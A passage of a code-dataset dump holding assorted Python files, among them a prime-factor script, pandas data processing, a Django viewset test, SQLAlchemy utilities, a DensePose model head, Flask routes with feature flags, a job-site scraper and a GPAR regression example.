prime_factors = []\n while number != 1:\n for x in gen_primes():\n if number % x == 0:\n prime_factors.append(x)\n number /= x\n break\n return prime_factors\n\n\nif __name__ == '__main__':\n pf = prime_factor(600851475143)\n print(pf)\n","sub_path":"Problem_3/max_prime_factor.py","file_name":"max_prime_factor.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"370991835","text":"# -*- coding: utf-8 -*-\n\nimport pandas as pd\n\nstrPath = '/Users/lishaojun/dev/pylisj/django/lte/static/data/'\n\n\nfileA = 'LTE样例数据.xlsx'\nfileB = 'taz_10_big.csv'\n\n\ndf = pd.read_excel(strPath+fileA)\n\ncols = ['子网', '子网名称', '网元', '网元名称','小区','小区名称' ]\nb = df.groupby(by=cols)['查询粒度'].count()\na = b.to_frame()\n\n#字段顺序为:子网ID,子网,网元ID,网元,小区\ndfc = pd.DataFrame({\"子网\":\"\", \"子网名称\":\"\",\"网元\":\"\",\"网元名称\":\"\",\"小区\":\"\",\"小区名称\":\"\"},index=[\"0\"])\ndfc = dfc.drop('0')\nfor index,row in a.iterrows():\n dfc = dfc.append(\n {\n \"子网\":index[0],\n \"子网名称\":index[1],\n \"网元\":index[2],\n \"网元名称\":index[3],\n \"小区\": index[4],\n \"小区名称\":index[5]\n },\n ignore_index=True)\n\ndfc.to_excel(strPath+'小区.xlsx',index=False, columns=cols)\n\n\nzw = df['子网'].unique()\nfor z in zw:\n fileB = str(z)+'.xlsx'\n dz = df[df['子网'] == z]\n dz.to_excel(strPath+'zw/'+fileB,index=False)","sub_path":"django/lte/scripts/anafile.py","file_name":"anafile.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"600958855","text":"import re\n\ntext = open('abbrtemp.txt','r').read().split('\\n')\n\ndef ret_full_form(abbr):\n abbr = abbr.upper()\n for f in tect:\n if f.find(abbr)!=-1:\n return f[f.find('\\x97')+1:]\n\ndef find_word(question):\n #Correction Needed\n q = re.sub(r' ',\"\",question)\n if q.find('of')!=-1:\n return q[q.find('of')+2:q.find('?')]\n if q.find('does')!=-1:\n return q2[q2.find('does')+5:q2.find('stand')-1]\n\ndef answer_abbreviations(question):\n abbr = find_word(question)\n print('Abbreviation ',abbr)\n return ret_full_form(abbr)\n","sub_path":"abbreviations.py","file_name":"abbreviations.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"71390462","text":"from django.test import TestCase\n\nfrom test_generator.viewsets import TestModelViewsetMixin\n\nfrom rdmo.accounts.utils import set_group_permissions\n\nfrom ..models import Attribute\n\n\nclass DomainViewsetTestCase(TestCase):\n\n fixtures = (\n 'users.json',\n 'groups.json',\n 'accounts.json',\n 'domain.json',\n 'options.json',\n )\n\n users = (\n ('editor', 'editor'),\n ('reviewer', 'reviewer'),\n ('user', 'user'),\n ('api', 'api'),\n ('anonymous', None),\n )\n\n status_map = {\n 'list_viewset': {\n 'editor': 200, 'reviewer': 200, 'api': 200, 'user': 403, 'anonymous': 401\n },\n 'detail_viewset': {\n 'editor': 200, 'reviewer': 200, 'api': 200, 'user': 403, 'anonymous': 401\n },\n 'create_viewset': {\n 'editor': 201, 'reviewer': 403, 'api': 201, 'user': 403, 'anonymous': 401\n },\n 'update_viewset': {\n 'editor': 200, 'reviewer': 403, 'api': 200, 'user': 403, 'anonymous': 401\n },\n 'delete_viewset': {\n 'editor': 204, 'reviewer': 403, 'api': 204, 'user': 403, 'anonymous': 401\n }\n }\n\n @classmethod\n def setUpTestData(cls):\n set_group_permissions()\n\n\nclass AttributeTests(TestModelViewsetMixin, DomainViewsetTestCase):\n\n # get attributes and order them by level to delete the attributes at the bottom of the tree first\n instances = Attribute.objects.order_by('-level')\n url_names = {\n 'viewset': 'v1-domain:attribute'\n }\n\n def _test_create_viewset(self, username):\n for instance in self.instances:\n instance.key += '_new'\n self.assert_create_viewset(username, data=self.get_instance_as_dict(instance))\n\n def _test_delete_viewset(self, username):\n for instance in self.instances:\n self.assert_delete_viewset(username, kwargs={\n 'pk': instance.pk\n })\n","sub_path":"rdmo/domain/tests/test_viewsets.py","file_name":"test_viewsets.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"435881469","text":"from collections import defaultdict\n\n\ndef traverse(graph, curr, result):\n descendants = 0\n\n for child in graph[curr]:\n num_nodes, result = traverse(graph, child, result)\n\n result[child] += num_nodes - 1\n descendants += num_nodes\n\n return descendants + 1, result\n\n\ndef max_edges(graph):\n start = list(graph)\n start = start[0]\n vertices = defaultdict(int)\n\n _, descendants = traverse(graph, start, vertices)\n\n return len([val for val in descendants.values() if val % 2 == 1])\n\n\ngraph = {\n 1: [2, 3],\n 2: [],\n 3: [4, 5],\n 4: [6, 7, 8],\n 5: [],\n 6: [],\n 7: [],\n 8: []\n}\n\nprint(max_edges(graph))\n","sub_path":"src/main/scala/KeepEvenNodeNumber.py","file_name":"KeepEvenNodeNumber.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"124403525","text":"#!/usr/bin/env python\nimport os\nimport sys\nimport re\nfrom typing import Tuple\nfrom collections import defaultdict\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.orm.query import Query\n#from sqlalchemy.inspection import inspect\nfrom sqlalchemy import inspect\nfrom sqlalchemy.ext.hybrid import hybrid_property\n\nimport logging\n\nlogging.basicConfig(format='%(process)d-%(levelname)s-%(message)s')\n\nsys.path.append(os.path.join(os.path.dirname(__file__)))\n\n\nclass BaseSQLConnector:\n \"\"\"\n Base class for SQL connectors\n \"\"\" \n def __init__(self) -> None:\n self.var = None\n \n def _create_conn_str(self, configs: dict, db: str = \"pgsql\") -> str:\n \"\"\"\n Create configuration from a dictioney\n :params configs: Configuration data as dictionery\n :params db: Database type. Supported DB type.\n Supported values PostgreSQL -> pgsql\n :returns conn_str: Connection string\n \"\"\"\n pgsql_str = \"postgresql+psycopg2://{0}:{1}@{2}/{3}\"\n \n conn_str = None\n \n if db == \"pgsql\":\n conn_str = pgsql_str.format(configs.get('user_name'),\n configs.get('passwd'),\n configs.get('host'),\n configs.get('database'))\n \n return conn_str\n \n\n\nclass PgSQLConnector(BaseSQLConnector):\n \"\"\"\n PostgreSQL Connctor with context manager examples\n ADopted from \n https://medium.com/@ramojol/python-context-managers-and-the-with-statement-8f53d4d9f87\n \"\"\"\n \n \n def __init__(self,config_data: dict) -> None:\n super().__init__()\n self.conn_str = self._create_conn_str(config_data,\n db='pgsql')\n self.db_session = None\n self.engine = None\n\n \n def __enter__(self):\n db_engine = create_engine(self.conn_str)\n self.engine = db_engine\n DBSession = sessionmaker()\n\n self.db_session = DBSession(bind=db_engine)\n return self\n\n def __exit__(self,exec_type,exec_val,exec_tb):\n self.db_session.close()\n\n\n\n# class MySQLConnector(BaseSQLConnector):\n# raise NotImplementedError\n\n# class MariaDBConnector(BaseSQLConnector):\n# raise NotImplementedError\n\n# class HiveConnector(BaseSQLConnector):\n# raise NotImplementedError\n\n# class ImpalaConnector(BaseSQLConnector):\n# raise NotImplementedError\n\n\ndef alch_query_to_dict(query_res: Query) -> dict:\n \"\"\"\n Convert SQL Alcheny resuts to a Python dictionary\n This is excellent for using with pandas DataFrame\n :params query_res: Query result object\n :returns documents: data as Dictionary\n \n Reference - https://gist.github.com/garaud/bda10fa55df5723e27da\n \"\"\"\n documents = defaultdict(list)\n \n for qobj in query_res:\n res_instance = inspect(qobj)\n for key,value in res_instance.attrs.items():\n documents[key].append(value.value)\n \n return documents\n \n\ndef parse_integrity_err(err_msg: str) -> Tuple[str,str]:\n \"\"\"\n Parse the integrity error from the SQLAlchemy\n IntegrityError message_detail. The message_detail\n contains information such as ['column_name', 'constraint_name',\n 'context', 'datatype_name', 'internal_position', \n 'internal_query', 'message_detail', 'message_hint', \n 'message_primary', 'schema_name', 'severity', \n 'source_file', 'source_function', 'source_line', \n 'sqlstate', 'statement_position', 'table_name']\n #REFERENCE - https://stackoverflow.com/questions/21540702/\n \n The message_detail contains information about \n Which column caused the primary key error and the\n First value SQLAlchemy tried to insert,\n :param err_msg: Error message (message_detail)\n :returns pk_column: Primary key column name\n :returns pk_val: Primary key valu e (first one)\n \"\"\"\n\n message_regex = r\"(\\(.*\\))=(\\(.*\\))\"\n\n pk_column = None\n pk_val = None\n\n pk_column_val_details = re.findall(message_regex,\n err_msg,\n re.MULTILINE)\n\n try:\n pk_column = pk_column_val_details[0][0]\n pk_column = pk_column.replace(\"(\",'')\n pk_column = pk_column.replace(\")\",'')\n pk_val = pk_column_val_details[0][1]\n pk_val = pk_val.replace(\"(\",'')\n pk_val = pk_val.replace(\")\",'')\n except Exception as err:\n logging.info(\"Error in processing the message {0}\".format(err))\n\n\n return (pk_column, pk_val)\n\nif __name__ == \"__main__\":\n connection_conf = {'user_name':'sweng',\n 'passwd':'*****',\n 'host':'myhost',\n 'database':'mydb'}\n\n with PgSQLConnector(connection_conf) as db:\n print(db.db_session)","sub_path":"course/utils/dbutils.py","file_name":"dbutils.py","file_ext":"py","file_size_in_byte":4976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"594337321","text":"import numpy as np\nfrom typing import Dict, List, Optional, Any\n\nimport torch, pdb, os, pickle\nimport torch.nn as nn\nfrom torch.nn import functional as F\nimport torch.utils.checkpoint as checkpoint\n\nfrom fvcore.nn import sigmoid_focal_loss_jit\nimport fvcore.nn.weight_init as weight_init\n\n# from adet.layers import conv_with_kaiming_uniform\n# from adet.utils.comm import aligned_bilinear\nfrom detectron2.layers import Conv2d, ShapeSpec, get_norm, ConvTranspose2d\nfrom detectron2.modeling import ROI_HEADS_REGISTRY, StandardROIHeads\nfrom detectron2.modeling.poolers import ROIPooler\nfrom detectron2.modeling.roi_heads import select_foreground_proposals\nfrom detectron2.structures import ImageList, Instances, Boxes\n\nfrom densepose.layers import conv_with_kaiming_uniform, deform_conv\nfrom densepose.utils.comm import compute_locations, compute_grid, aligned_bilinear\nfrom ..roi_heads import DensePoseDeepLabHead\nfrom .. import (\n build_densepose_data_filter,\n build_densepose_head,\n build_densepose_losses,\n build_densepose_predictor,\n densepose_inference,\n)\nfrom lambda_networks import LambdaLayer\nfrom .iuv_head import get_embedder\nfrom ..utils import initialize_module_params\nimport pdb\n\nINF = 100000000\n\ndef build_iuv_pooler2_head(cfg, input_shape):\n # return GlobalIUVHead(cfg)\n return CoordGlobalIUVPooler2Head(cfg, input_shape=input_shape)\n\n\nclass Decoder(nn.Module):\n \"\"\"\n A semantic segmentation head described in detail in the Panoptic Feature Pyramid Networks paper\n (https://arxiv.org/abs/1901.02446). It takes FPN features as input and merges information from\n all levels of the FPN into single output.\n \"\"\"\n\n def __init__(self, cfg, input_shape: Dict[str, ShapeSpec], in_features: torch.Tensor, pe_dim=0):\n super(Decoder, self).__init__()\n\n # fmt: off\n self.in_features = in_features\n feature_strides = {k: v.stride for k, v in input_shape.items()}\n feature_channels = {k: v.channels for k, v in input_shape.items()}\n # num_classes = cfg.MODEL.ROI_DENSEPOSE_HEAD.DECODER_NUM_CLASSES\n num_classes = 75\n conv_dims = cfg.MODEL.ROI_DENSEPOSE_HEAD.DECODER_CONV_DIMS\n self.common_stride = cfg.MODEL.ROI_DENSEPOSE_HEAD.DECODER_COMMON_STRIDE\n norm = cfg.MODEL.ROI_DENSEPOSE_HEAD.DECODER_NORM\n num_lambda_layer = cfg.MODEL.CONDINST.IUVHead.NUM_LAMBDA_LAYER\n lambda_layer_r = cfg.MODEL.CONDINST.IUVHead.LAMBDA_LAYER_R\n self.use_ins_gn = cfg.MODEL.CONDINST.IUVHead.INSTANCE_AWARE_GN\n # fmt: on\n\n self.scale_heads = []\n for in_feature in self.in_features:\n head_ops = []\n head_length = max(\n 1, int(np.log2(feature_strides[in_feature]) - np.log2(self.common_stride))\n )\n for k in range(head_length):\n conv = Conv2d(\n feature_channels[in_feature] if k == 0 else conv_dims,\n conv_dims,\n kernel_size=3,\n stride=1,\n padding=1,\n bias=not norm,\n norm=get_norm(norm, conv_dims),\n activation=F.relu,\n )\n weight_init.c2_msra_fill(conv)\n head_ops.append(conv)\n if feature_strides[in_feature] != self.common_stride:\n head_ops.append(\n nn.Upsample(scale_factor=2, mode=\"bilinear\", align_corners=False)\n )\n self.scale_heads.append(nn.Sequential(*head_ops))\n self.add_module(in_feature, self.scale_heads[-1])\n\n # self.predictor = Conv2d(conv_dims, num_classes, kernel_size=1, stride=1, padding=0)\n \n\n if num_lambda_layer>0:\n self.comb_pe_conv = LambdaLayer(\n dim = conv_dims+pe_dim,\n dim_out = conv_dims,\n r = lambda_layer_r, # the receptive field for relative positional encoding (23 x 23)\n dim_k = 16,\n heads = 4,\n dim_u = 4\n )\n else:\n self.comb_pe_conv = Conv2d(\n conv_dims+pe_dim,\n conv_dims,\n kernel_size=3,\n stride=1,\n padding=1,\n bias=not norm,\n norm=get_norm(norm, conv_dims),\n activation=F.relu,\n )\n # weight_init.c2_msra_fill(self.comb_pe_conv)\n\n self.densepose_head = build_densepose_head(cfg, conv_dims)\n\n self.predictor = Conv2d(\n cfg.MODEL.ROI_DENSEPOSE_HEAD.CONV_HEAD_DIM, num_classes, 1, stride=1, padding=0\n )\n initialize_module_params(self.predictor)\n # weight_init.c2_msra_fill(self.predictor)\n\n def forward(self, features: List[torch.Tensor], iuv_feats: torch.Tensor, rel_coord: Any, abs_coord: Any, fg_mask: Any, ins_mask_list=None):\n for i, _ in enumerate(self.in_features):\n if i == 0:\n x = self.scale_heads[i](features[i])\n else:\n x = x + self.scale_heads[i](features[i])\n if rel_coord is not None:\n x = torch.cat([x,rel_coord], dim=1)\n if abs_coord is not None:\n x = torch.cat([x,abs_coord], dim=1)\n # if skeleton_feats is not None:\n # x = torch.cat([x,skeleton_feats], dim=1)\n\n # pdb.set_trace()\n if rel_coord is not None or abs_coord is not None:\n x = self.comb_pe_conv(x)\n x = x * fg_mask\n\n\n if self.use_ins_gn:\n ## dense to sparse\n N, C, H, W = x.shape\n coord = compute_grid(H, W, device=x.device, norm=False)\n # sparse_coord_batch = []\n # sparse_feat_batch = []\n ins_indices_batch = []\n # ins_indices_len = []\n # ins_cnt = 0\n for n in range(N):\n # m = fg_mask[n:n+1]\n x_indices = coord[0]\n y_indices = coord[1]\n # pdb.set_trace()\n # bg_and_ins = torch.cat([m[0],ins_mask_list[n].float()], dim=0)\n # ins_indices = torch.argmax(bg_and_ins, dim=0)[m[0,0]>0] + ins_cnt\n # try:\n # pdb.set_trace()\n logit_bg_fg = torch.cat([(1-fg_mask[n])*99999., ins_mask_list[n].float()], dim=0)\n ins_indices = torch.argmax(logit_bg_fg, dim=0) - 1 ## set bg to -1\n ins_indices[ins_indices>=0] = ins_indices[ins_indices>=0] #+ ins_cnt\n ins_indices_batch.append(ins_indices)\n # ins_cnt += ins_mask_list[n].shape[0] - 1 ## exclude bg class\n\n ins_indices_batch = torch.stack(ins_indices_batch,dim=0)\n\n x = self.densepose_head(x, ins_indices_batch)\n else:\n x = self.densepose_head(x)\n x = self.predictor(x)\n\n return x\n\n\nclass CoordGlobalIUVPooler2Head(nn.Module):\n def __init__(self, cfg, input_shape=None):\n super().__init__()\n\n self._init_densepose_head(cfg, input_shape)\n\n def _init_densepose_head(self, cfg, input_shape):\n self.in_features = cfg.MODEL.ROI_HEADS.IN_FEATURES\n self.use_rel_coords = cfg.MODEL.CONDINST.IUVHead.REL_COORDS\n self.use_abs_coords = cfg.MODEL.CONDINST.IUVHead.ABS_COORDS\n self.pos_emb_num_freqs = cfg.MODEL.CONDINST.IUVHead.POSE_EMBEDDING_NUM_FREQS\n self.use_gt_ins = cfg.MODEL.CONDINST.IUVHead.GT_INSTANCES\n self.inference_global_siuv = cfg.MODEL.CONDINST.INFERENCE_GLOBAL_SIUV\n self.add_skeleton_feat = cfg.MODEL.CONDINST.IUVHead.SKELETON_FEATURES\n self.use_pos_emb = self.pos_emb_num_freqs>0\n if self.use_pos_emb:\n self.position_embedder, self.position_emb_dim = get_embedder(multires=self.pos_emb_num_freqs, input_dims=2)\n self.pe_dim_all = 0\n if self.use_rel_coords:\n self.pe_dim_all += self.position_emb_dim\n if self.use_abs_coords:\n self.pe_dim_all += self.position_emb_dim\n if self.add_skeleton_feat:\n self.pe_dim_all += 55\n self.decoder = Decoder(cfg, input_shape, self.in_features, self.pe_dim_all)\n\n dp_pooler_resolution = cfg.MODEL.ROI_DENSEPOSE_HEAD.HEATMAP_SIZE\n dp_pooler_sampling_ratio = 0\n dp_pooler_type = cfg.MODEL.ROI_DENSEPOSE_HEAD.POOLER_TYPE\n dp_pooler_scales = (1.0 / input_shape[self.in_features[0]].stride,)\n # in_channels = [input_shape[f].channels for f in self.in_features][0]\n self.densepose_pooler = ROIPooler(\n output_size=dp_pooler_resolution,\n scales=dp_pooler_scales,\n sampling_ratio=dp_pooler_sampling_ratio,\n pooler_type=dp_pooler_type,\n )\n # self.densepose_head = build_densepose_head(cfg, in_channels)\n # self.densepose_predictor = build_densepose_predictor(\n # cfg, self.densepose_head.n_out_channels\n # )\n self.densepose_losses = build_densepose_losses(cfg)\n\n def forward(self, fpn_features, s_logits, iuv_feats, iuv_feat_stride, rel_coord, instances, fg_mask, gt_instances=None, ins_mask_list=None):\n # assert not self.use_abs_coords\n\n fea0 = fpn_features[self.in_features[0]]\n N, _, H, W = fea0.shape\n\n if self.use_rel_coords: \n if self.use_pos_emb:\n rel_coord = self.position_embedder(rel_coord)\n else:\n rel_coord = None\n\n if self.use_abs_coords: \n abs_coord = compute_grid(H, W, device=fea0.device)[None,...].repeat(N,1,1,1)\n if self.use_pos_emb:\n abs_coord = self.position_embedder(abs_coord)\n else:\n abs_coord = None\n\n features = [fpn_features[f] for f in self.in_features]\n\n if self.inference_global_siuv:\n assert not self.training\n\n if self.training:\n features = [self.decoder(features, iuv_feats, rel_coord, abs_coord, fg_mask, ins_mask_list)]\n features_dp_ori = features[0]\n proposal_boxes = [x.gt_boxes for x in gt_instances]\n features_dp = self.densepose_pooler(features, proposal_boxes)\n iuv_logits = features_dp\n # iuv_logit_global = features[0]\n return None, iuv_logits, features_dp_ori\n else:\n features = [self.decoder(features, iuv_feats, rel_coord, abs_coord, fg_mask, ins_mask_list)]\n # pdb.set_trace()\n features_dp_ori = features[0]\n\n if self.inference_global_siuv:\n iuv_logits = features[0]\n coarse_segm = s_logits\n else:\n # if isinstance(instances,Instances):\n # if self.use_gt_ins:\n # proposal_boxes = [x.gt_boxes for x in gt_instances]\n # else:\n proposal_boxes = [instances.pred_boxes]\n # else:\n # proposal_boxes = [x.pred_boxes for x in instances]\n features_dp = self.densepose_pooler(features, proposal_boxes)\n # pdb.set_trace()\n s_logit_list = []\n for idx in range(s_logits.shape[0]):\n s_logit = self.densepose_pooler([s_logits[idx:idx+1]], [proposal_boxes[0][idx:idx+1]])\n s_logit_list.append(s_logit)\n coarse_segm = torch.cat(s_logit_list,dim=0)\n # iuv_logit = torch.cat([torch.cat(s_logit_list,dim=0), features_dp], dim=1)\n # iuv_logit_global = features[0]\n iuv_logits = features_dp\n # print(instances.pred_boxes)\n # else:\n # features = [self.decoder(features, iuv_feats, rel_coord, abs_coord, fg_mask, ins_mask_list)]\n # proposal_boxes = [instances.pred_boxes]\n # features_dp = self.densepose_pooler(features, proposal_boxes)\n # iuv_logit = features_dp\n # iuv_logit_global = features[0]\n\n\n return coarse_segm, iuv_logits, features_dp_ori\n\n\n\n\n\n\n","sub_path":"projects/DensePose/densepose/modeling/condinst/iuv_pooler2_head.py","file_name":"iuv_pooler2_head.py","file_ext":"py","file_size_in_byte":12071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"266922130","text":"import json\nimport logging\n\nimport ldclient\nfrom flask import (Blueprint, current_app, flash, redirect, render_template,\n request, url_for)\nfrom flask_login import current_user, login_required, login_user, logout_user\nfrom werkzeug.urls import url_parse\n\nfrom app.factory import CACHE_TIMEOUT, CachingDisabled, cache, db\nfrom app.models import User, Plan\n\ncore = Blueprint('core', __name__)\n\n@core.route('/')\n@core.route('/index')\n@login_required\ndef index():\n theme = request.args.get(\"theme\")\n if theme:\n updateTheme(theme)\n \n beta_features = ldclient.get().variation('dark-theme', current_user.get_ld_user(), False)\n \n set_theme = '{0}/index.html'.format(current_user.set_path)\n\n return render_template(set_theme, title='Home', show_beta=beta_features)\n\ndef updateTheme(theme):\n\n if theme == \"dark\":\n current_user.set_path = 'beta'\n else:\n current_user.set_path = 'default'\n\n db.session.commit()\n\n@core.route('/dark')\ndef darkTheme():\n return render_template(set_theme, title='Dark Theme')\n\n@core.route('/experiments')\ndef experiments():\n theme = request.args.get(\"theme\")\n if theme:\n updateTheme(theme)\n \n set_theme = '{0}/exp.html'.format(current_user.set_path)\n\n random_user = current_user.get_random_ld_user()\n\n show_nps = ldclient.get().variation('show-nps-survery', random_user, False)\n \n return render_template(set_theme, title='Experiments', show_nps=show_nps, random_user=random_user)\n\n@core.route('/operational')\ndef operational():\n theme = request.args.get(\"theme\")\n if theme:\n updateTheme(theme)\n \n set_theme = '{0}/operation.html'.format(current_user.set_path)\n \n return render_template(set_theme, title='Operational')\n\n@core.route('/release')\ndef release():\n theme = request.args.get(\"theme\")\n if theme:\n updateTheme(theme)\n \n set_theme = '{0}/release.html'.format(current_user.set_path)\n\n return render_template(set_theme, title='Dark Theme')\n\n@core.route('/entitlement')\ndef entitlement():\n theme = request.args.get(\"theme\")\n if theme:\n updateTheme(theme)\n \n set_theme = '{0}/entitlement.html'.format(current_user.set_path)\n\n return render_template(set_theme, title='entitlement')\n\n# I decided to take out a payday loan on this shit. \n# http://flask.pocoo.org/docs/1.0/quickstart/?highlight=post#http-methods\n@core.route('/register', methods=['GET', 'POST'])\ndef register():\n if current_user.is_authenticated:\n return redirect(url_for('core.index'))\n if request.method == 'POST':\n user = User(email=request.form['userEmail'])\n # check if userName exist\n if User.query.filter_by(email = request.form['userEmail']).first() is not None:\n flash('Email is already taken. Please choose another email')\n return redirect(url_for('core.register'))\n # check if passwords match\n if request.form['inputPassword'] != request.form['confirmPassword']:\n flash('Passwords must match')\n return redirect(url_for('core.register'))\n user.set_password(request.form['inputPassword'])\n db.session.add(user)\n db.session.commit()\n flash('Congratulations, you are now a registered user!')\n login_user(user)\n return redirect(url_for('core.index'))\n return render_template('beta/auth/register.html', title='Support Request')\n\n@core.route('/login', methods=['GET', 'POST'])\ndef login(theme='default'):\n if current_user.is_authenticated:\n return redirect(url_for('core.index'))\n if request.method == 'POST':\n user = User.query.filter_by(email=request.form['userEmail']).first()\n if user is None or not user.check_password(request.form['inputPassword']):\n flash('Invalid username or password')\n return redirect(url_for('core.login'))\n login_user(user)\n next_page = request.args.get('next')\n if not next_page or url_parse(next_page).netloc != '':\n next_page = url_for('core.index')\n return redirect(next_page)\n '''\n\n '''\n return render_template('beta/auth/login.html', title='Sign In')\n\n@core.route('/logout')\ndef logout():\n logout_user()\n return redirect(url_for('core.index'))\n\n@core.route('/profile')\n@login_required\ndef profile():\n user = User.query.filter_by(id=current_user.id).first()\n return render_template(\n 'default/profile.html',\n user=user\n )\n\n@core.route('/people')\n@cache.cached(timeout=CACHE_TIMEOUT(), unless=CachingDisabled())\n@login_required\ndef people():\n users = User.query.order_by(User.id).all()\n return render_template(\n 'default/people.html',\n users=users\n )\n\n@core.route('/settings')\n@login_required\ndef settings():\n plans = Plan.query.all()\n\n return render_template(\n 'default/settings.html',\n plans=plans\n )\n\n@core.route('/upgrade')\n@login_required\ndef upgrade():\n current_user.plan_id = request.args.get('plan')\n db.session.commit()\n\n return redirect(request.referrer)","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":5076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"546129437","text":"# -*- coding: utf-8 -*-\nfrom urllib import request, parse\nfrom bs4 import BeautifulSoup\n\n# Link constants\n_URL_WEBSITE_RABOTA = 'http://rabota.ua/jobsearch/vacancy_list?regionId=3&keyWords={0}&period=3&pg={1}'\n_URL_WEBSITE_DOU = 'https://jobs.dou.ua/vacancies/?city=%D0%9E%D0%B4%D0%B5%D1%81%D1%81%D0%B0&search={0}'\n\n\ndef parse_dou(message_text):\n \"\"\"Function to parse jobs on dou.ua\n :param message_text: Job to search\n :returns String of found jobs\"\"\"\n\n url = _URL_WEBSITE_DOU \\\n .format(parse.quote_plus(message_text)) \\\n .replace(\" \", \"+\")\n soup = _get_soup(url)\n\n try:\n ul = soup.find('ul', class_='lt')\n\n string = \"\"\n for li in ul.find_all('li'):\n\n # Creating String answer\n string = string + \\\n '\\n' + li.find('a', class_='vt').text + \\\n '\\n(' + li.find('a', class_='company').text + ' )' + '\\n' + \\\n li.find('a', class_='vt')['href']\n\n return \"dou.ua\\n\" + string\n\n except AttributeError:\n return \"\"\n\n\ndef parse_rabota(message_text, page=1):\n \"\"\"Function to parse jobs on rabota.ua\n :param message_text: Job to search\n :param page: Current page of\n :returns String of jobs\"\"\"\n\n url = _URL_WEBSITE_RABOTA \\\n .format(parse.quote_plus(message_text), str(page)) \\\n .replace(\" \", \"+\")\n soup = _get_soup(url)\n\n if soup.find('p', class_='rua-p-t_20'):\n return \"\"\n\n string = \"\"\n try:\n table = soup.find('table', class_='vv')\n\n for tr in table.find_all('tr'):\n title = tr.find('a', class_='t').text\n title = title[:title.find('\\n')]\n\n company = tr.find('div', class_='s').text\n company = company[:company.find('\\n')]\n\n # Creating String answer\n string = string + \\\n '\\n' + title + \\\n '\\n( ' + company + ' )' + '\\n' + \\\n \"http://rabota.ua\" + tr.find('a', class_='t')['href']\n\n return \"rabota.ua\\n\" + string\n except AttributeError:\n if page >= 2:\n return \"rabota.ua\\n\" + string + \"\\n\\nMore vacancies here:\\n\" + url\n else:\n return string + parse_rabota(message_text, page + 1)\n\n\ndef _get_html(url):\n \"\"\"Function to get HTML\n :param url: url of website to read\n :return html of website\"\"\"\n\n return request.urlopen(url).read()\n\n\ndef _get_soup(url):\n \"\"\"Get soup by url\n :param url\n :return Soup of website\"\"\"\n\n return BeautifulSoup(\n _get_html(url),\n \"html.parser\"\n )\n","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"181982817","text":"import tempfile\nimport os\n\n\nEXPECTED_TIME_TO_BOOT = 60 # seconds\nRESET = \"\\033[0m\"\nBOLD = \"\\033[1m\"\nRED = \"\\033[31m\"\nOBJECTS = os.environ.get(\"OBJECTS\", \".osbuild-test\")\nOUTPUT_DIR = os.environ.get(\"OUTPUT_DIR\", \"output-test\")\nOSBUILD = os.environ.get(\"OSBUILD\", \"python3 -m osbuild --libdir .\").split(' ')\n","sub_path":"test/integration_tests/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"32351208","text":"from django.contrib import admin\nfrom django.urls import path\nfrom .views import *\n\nurlpatterns = [\n path('community/', community, name=\"community\"),\n path('writef/', writef, name=\"writef\"),\n path('map/', map, name=\"map\"),\n path('developers/', developers, name=\"developers\"),\n path('post_search/', post_search, name=\"post_search\"),\n]","sub_path":"FM/fmapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"135289118","text":"import numpy as np\nfrom gpar import GPARRegressor, log_transform\nfrom lab import B\n\nB.epsilon = 1e-8\n\n\ndef load(fp):\n data = np.genfromtxt(fp, delimiter=',', dtype=str)[:, 1:]\n header, data = data[0], data[1:].astype(float)\n header = [h[1:-1] for h in header] # Remove quotes.\n x = data[:, [header.index(name) for name in ['Xloc', 'Yloc']]]\n y = data[:, [header.index(name) for name in ['Ni', 'Zn', 'Cd']]]\n return x, y\n\n\n# Load and extract data.\nx_train, y_train = load('examples/data/jura/jura_prediction.dat')\nx_test, y_test = load('examples/data/jura/jura_validation.dat')\n\n# Append first two outputs of test data to training data: the last one is\n# predicted.\nx_train = np.concatenate((x_train, x_test), axis=0)\ny_train_test = y_test.copy()\ny_train_test[:, -1] = np.nan\ny_train = np.concatenate((y_train, y_train_test), axis=0)\n\n# Fit and predict GPAR.\nmodel = GPARRegressor(scale=10.,\n linear=False, nonlinear=True, nonlinear_scale=1.0,\n noise=0.1,\n impute=True, replace=True, normalise_y=True,\n transform_y=log_transform)\nmodel.fit(x_train, y_train, fix=False)\nmeans_test = model.predict(x_test, num_samples=200, latent=True)\n\n# Compute MAE.\nprint('MAE:', np.nanmean(np.abs(y_test[:, -1] - means_test[:, -1])))\n","sub_path":"examples/paper/jura.py","file_name":"jura.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"159419658","text":"import os\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nimport matplotlib as mpl\nimport seaborn as sb\nfrom federalRegister.loader import loadAgencyDF\nfrom nonparametricPlots import loessPlot\n\nfrom regcomments.dirs import *\n\n\n#Load data\nstreamsDF = pd.read_csv(os.path.join(dataDir,'streams','streamsWithRegChange.csv'))\nfrDocCommentsDF = 